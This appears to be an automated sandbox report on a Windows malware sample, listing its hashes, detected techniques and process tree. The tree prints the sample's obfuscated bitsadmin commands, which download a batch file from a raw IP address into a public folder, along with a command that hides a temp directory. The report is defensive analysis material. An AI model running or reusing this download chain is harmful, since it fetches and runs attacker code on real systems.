Analysis

  • max time kernel
    94s
  • max time network
    96s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    05-08-2024 14:05

General

  • Target

    ab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15.exe

  • Size

    126KB

  • MD5

    b2dc0f8a36a7e450b11149a8e15ca964

  • SHA1

    27fd3d24a969b5b0528b69f1cbd8b293e74a6809

  • SHA256

    ab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15

  • SHA512

    135b14382607e69e38a1e8ff3795233e0636fa29657e154270595b92804973ed96041d223eda9c71e270970df850a72b5f6b869d4b92fd51522bd52be8e8b933

  • SSDEEP

    1536:06/2vO9g8CoiedwWRNxDzaoOeJSZHewWXTW6F8huRUTc333VnvwYXDBHEi4nuQr6:d/2vO9g8CNed7XaoO8SZHBX4

Score
8/10

Malware Config

Signatures

  • Download via BitsAdmin 1 TTPs 2 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 19 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious use of WriteProcessMemory 54 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\ab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15.exe
    "C:\Users\Admin\AppData\Local\Temp\ab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15.exe"
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:4036
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ytmp\t27959.bat" "C:\Users\Admin\AppData\Local\Temp\ab69f5c1027fbf46ed1c17fc2f9843d94948df84eeefa2a3548d21329f409f15.exe" "
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1760
      • C:\Windows\SysWOW64\attrib.exe
        attrib +h C:\Users\Admin\AppData\Local\Temp\ytmp
        3⤵
        • System Location Discovery: System Language Discovery
        • Views/modifies file attributes
        PID:3592
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\System32\cmd.exe /c ""Bitsadmin
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2028
        • C:\Windows\SysWOW64\bitsadmin.exe
          Bitsadmin
          4⤵
          • System Location Discovery: System Language Discovery
          PID:4348
      • C:\Windows\SysWOW64\bitsadmin.exe
        bitsadmin
        3⤵
        • System Location Discovery: System Language Discovery
        PID:1756
      • C:\Windows\SysWOW64\bitsadmin.exe
        bitsadmin /crEaTe pls
        3⤵
        • Download via BitsAdmin
        • System Location Discovery: System Language Discovery
        PID:4472
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\System32\cmd.exe /c ""Bitsadmin
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4236
        • C:\Windows\SysWOW64\bitsadmin.exe
          Bitsadmin
          4⤵
          • System Location Discovery: System Language Discovery
          PID:3192
      • C:\Windows\SysWOW64\bitsadmin.exe
        bitsadmin
        3⤵
        • System Location Discovery: System Language Discovery
        PID:4564
      • C:\Windows\SysWOW64\bitsadmin.exe
        bitsadmin /ResUme pls
        3⤵
        • System Location Discovery: System Language Discovery
        PID:4968
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\System32\cmd.exe /c ""Bitsadmin
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1916
        • C:\Windows\SysWOW64\bitsadmin.exe
          Bitsadmin
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2932
      • C:\Windows\SysWOW64\bitsadmin.exe
        bitsadmin
        3⤵
        • System Location Discovery: System Language Discovery
        PID:3284
      • C:\Windows\SysWOW64\bitsadmin.exe
        bitsadmin /CompLete pls
        3⤵
        • System Location Discovery: System Language Discovery
        PID:4576
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\System32\cmd.exe /c ""Bitsadmin
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3300
        • C:\Windows\SysWOW64\bitsadmin.exe
          Bitsadmin
          4⤵
          • System Location Discovery: System Language Discovery
          PID:4436
      • C:\Windows\SysWOW64\bitsadmin.exe
        bitsadmin
        3⤵
        • System Location Discovery: System Language Discovery
        PID:5060
      • C:\Windows\SysWOW64\bitsadmin.exe
        bitsadmin /TRanSfer pls http:164.90.244.116/run2025.bat C:\Users\Public\run2025.bat
        3⤵
        • Download via BitsAdmin
        • System Location Discovery: System Language Discovery
        PID:896

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\ytmp\t27959.bat

    Filesize

    2KB

    MD5

    9f9313c2c1cd60650bc4be0175a93d05

    SHA1

    53f62a866349d2c08c6bb5c9c7bfad3faf785a77

    SHA256

    380d4be6e794605bb9777361f1c5221f8597e29a4f03c35360b5884e588d2011

    SHA512

    18fd8d7e685371ff9a3506c4a925e2aff927b2da6d6195689ba7c240c28654b6c71aa724eeee66a181b2f6f231bcd24635b314c54c2d80713e3c89937a4b213e